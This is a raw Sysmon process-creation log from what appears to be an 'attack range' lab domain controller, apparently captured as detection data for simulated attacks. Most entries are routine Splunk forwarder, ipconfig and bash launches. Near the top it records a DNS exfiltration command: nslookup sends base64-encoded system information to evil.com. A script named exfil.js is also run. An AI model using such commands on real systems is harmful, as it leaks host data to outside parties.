C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-58B4-6078-F20D-00000000AE01}5664C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmtg.tmp 2>&1 154100x800000000000000067072Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:04.277{A8622C2F-58B4-6078-F20D-00000000AE01}5664C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmtg.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000067046Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:02.110{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=BEB231ACF04E40B506403920D4DD795A,SHA256=2548884526E8FBC5781F5B3B2972E9B20CC16DD86BDE93D2E888023F6919F5A2,IMPHASH=661A40859BC6D47752E9FC5E02C1862C{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000067005Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:52.602{A8622C2F-58A8-6078-F00D-00000000AE01}5084C:\Windows\System32\ipconfig.exe10.0.14393.0 (rs1_release.160715-1616)IP Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationipconfig.exeC:\Windows\system32\ipconfig.exe /displaydnsC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=29916DCEA5377C19996B417D9235F42F,SHA256=5EE3FD7CA1AC876D0DE539D469BFC333594FCA3DF9F377CC96C756D9648697F1,IMPHASH=3636F50089F8190E3308E8AEA8F2043A{A8622C2F-58A8-6078-EF0D-00000000AE01}5764C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000066986Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:52.591{A8622C2F-58A8-6078-EF0D-00000000AE01}5764C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000066942Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:43.814{A8622C2F-589F-6078-EE0D-00000000AE01}5840C:\Windows\System32\ipconfig.exe10.0.14393.0 (rs1_release.160715-1616)IP Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationipconfig.exeC:\Windows\system32\ipconfig.exe /flushdnsC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=29916DCEA5377C19996B417D9235F42F,SHA256=5EE3FD7CA1AC876D0DE539D469BFC333594FCA3DF9F377CC96C756D9648697F1,IMPHASH=3636F50089F8190E3308E8AEA8F2043A{A8622C2F-589F-6078-ED0D-00000000AE01}1348C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000066923Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:43.803{A8622C2F-589F-6078-ED0D-00000000AE01}1348C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000066862Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:24.461{A8622C2F-588C-6078-EC0D-00000000AE01}5872C:\Windows\System32\ipconfig.exe10.0.14393.0 (rs1_release.160715-1616)IP Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationipconfig.exeC:\Windows\system32\ipconfig.exe /displaydnsC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=29916DCEA5377C19996B417D9235F42F,SHA256=5EE3FD7CA1AC876D0DE539D469BFC333594FCA3DF9F377CC96C756D9648697F1,IMPHASH=3636F50089F8190E3308E8AEA8F2043A{A8622C2F-588C-6078-EB0D-00000000AE01}5368C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000066843Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:24.390{A8622C2F-588C-6078-EB0D-00000000AE01}5368C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000066827Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:22.265{A8622C2F-588A-6078-EA0D-00000000AE01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066813Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:20.625{A8622C2F-5888-6078-E90D-00000000AE01}3736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066801Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:19.961{A8622C2F-5887-6078-E80D-00000000AE01}6456C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066792Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:19.294{A8622C2F-5887-6078-E70D-00000000AE01}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066776Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:17.589{A8622C2F-5885-6078-E60D-00000000AE01}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066766Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:16.907{A8622C2F-5884-6078-E50D-00000000AE01}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066757Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:16.241{A8622C2F-5884-6078-E40D-00000000AE01}2424C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066565Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:14:22.254{A8622C2F-584E-6078-E30D-00000000AE01}2952C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066551Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:14:20.641{A8622C2F-584C-6078-E20D-00000000AE01}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066541Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:14:19.953{A8622C2F-584B-6078-E10D-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066529Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:14:19.277{A8622C2F-584B-6078-E00D-00000000AE01}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066515Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:14:17.665{A8622C2F-5849-6078-DF0D-00000000AE01}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066504Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:14:16.998{A8622C2F-5848-6078-DE0D-00000000AE01}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066494Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:14:16.330{A8622C2F-5848-6078-DD0D-00000000AE01}5392C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066265Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:13:40.440{A8622C2F-5824-6078-DB0D-00000000AE01}6968C:\Program Files\Notepad++\notepad++.exe7.95Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\Windows\System32\drivers\etc\hosts"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=45833E3CFFD3716546665DCE0C343F2E,SHA256=5AEC02154C9A23F5D77B11853691449063AA0EF3988C4EB30048DEBBCEC8B947,IMPHASH=DE4B8987D5ADB218127887FA4130E9E8{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000066200Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:13:22.248{A8622C2F-5812-6078-DA0D-00000000AE01}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066188Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:13:20.563{A8622C2F-5810-6078-D90D-00000000AE01}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066176Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:13:19.942{A8622C2F-580F-6078-D80D-00000000AE01}4968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066166Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:13:19.276{A8622C2F-580F-6078-D70D-00000000AE01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066144Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:13:17.618{A8622C2F-580D-6078-D60D-00000000AE01}6824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066132Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:13:16.982{A8622C2F-580C-6078-D50D-00000000AE01}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066122Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:13:16.331{A8622C2F-580C-6078-D40D-00000000AE01}1372C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065897Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:12:22.251{A8622C2F-57D6-6078-D20D-00000000AE01}5200C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065884Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:12:20.566{A8622C2F-57D4-6078-D10D-00000000AE01}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065873Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:12:19.962{A8622C2F-57D3-6078-D00D-00000000AE01}1476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065864Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:12:19.280{A8622C2F-57D3-6078-CF0D-00000000AE01}2676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 